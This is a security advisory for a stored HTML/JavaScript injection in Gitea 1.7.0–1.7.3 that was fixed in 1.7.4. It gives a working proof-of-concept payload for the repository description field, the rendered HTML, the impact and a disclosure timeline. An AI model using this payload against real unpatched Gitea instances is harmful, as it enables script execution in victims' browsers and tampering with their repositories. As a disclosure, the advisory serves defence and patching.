Vulners
Lucene search
Gitea 1.7.3 HTML Injection
`Gitea 1.7.3 stored HTML injection (XSS)
#######################################
Information
===========
Name: Gitea 1.7.0 - 1.7.3 stored HTML injection
Software: Gitea - a self-hosted Git service
Homepage: https://gitea.io/
Vulnerability: stored HTML injection
Affected: 1.7.0 - 1.7.3
Tested: 1.7.2, 1.7.3
Fixed: 1.7.4
Prerequisites: edit repository settings
Severity: low
CVE: NA
Credit: Anti RA$?is
HTML version: https://bitflipper.eu/
Description
===========
Gitea is a self hosted git repository service, which is affected by stored
HTML injection vulnerability, allowing authenticated user to inject payload
into repository's description field. It is executed, when victim navigates
to malicious repository's code page.
Proof of Concept
================
Attacker needs to create a new public repository and set the description
containing payload.
==================== source start ========================
<img id="xss" src="http://onerror=eval(
document.querySelectorAll('span')[10].innerText)//">
<span>document.querySelector('#xss').parentNode.innerHTML='\x3cmarquee
style=color:red\x3eXSS\x3c/marquee\x3e';alert('XSS')</span>
==================== source end ========================
Code is executed, when victim navigates to malicious repository's code page.
Following HTML snippet demonstrates the issue:
==================== source start ========================
<div id="repo-desc">
<span class="description has-emoji"><img id="xss" src="<a
href="http://onerror=eval(
document.querySelectorAll('span')[10].innerText)//">"
target="_blank" rel="noopener noreferrer">http://onerror=eval(
document.querySelectorAll('span')[10].innerText)//"></a>
<span>
document.querySelector('#xss').parentNode.innerHTML='\x3cmarquee
style=color:red\x3eXSS\x3c/marquee\x3e';alert('XSS')</span>
</span>
<a class="link" href=""></a>
</div>
==================== source end ========================
Impact
======
Authenticated attacker can execute JavaScript in the victim's browser and
possibly use it to change code in victim's repository.
Conclusion
==========
New release was published as a result and vulnerability is patched in Gitea
1.7.4.
References
==========
1) New release announcement
https://blog.gitea.io/2019/03/gitea-1.7.4-is-released/
2) Patch pull request on github
https://github.com/go-gitea/gitea/pull/6306
Timeline
========
28.02.2019 | me | vulnerability discovered
28.02.2019 | me > developer | sent report to the developers; no response
06.03.2019 | me > developer | asked for status update
06.03.2019 | developer > me | answer to status update: they are working
| | on a patch
13.03.2019 | developer > public | patched version released
17.03.2019 | me > public | published vulnerability details
---
Anti RA$?is
Blog: https://bitflipper.eu
Pentester at http://www.clarifiedsecurity.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Mar 2019 00:00Current
7.4High risk
Vulners AI Score7.4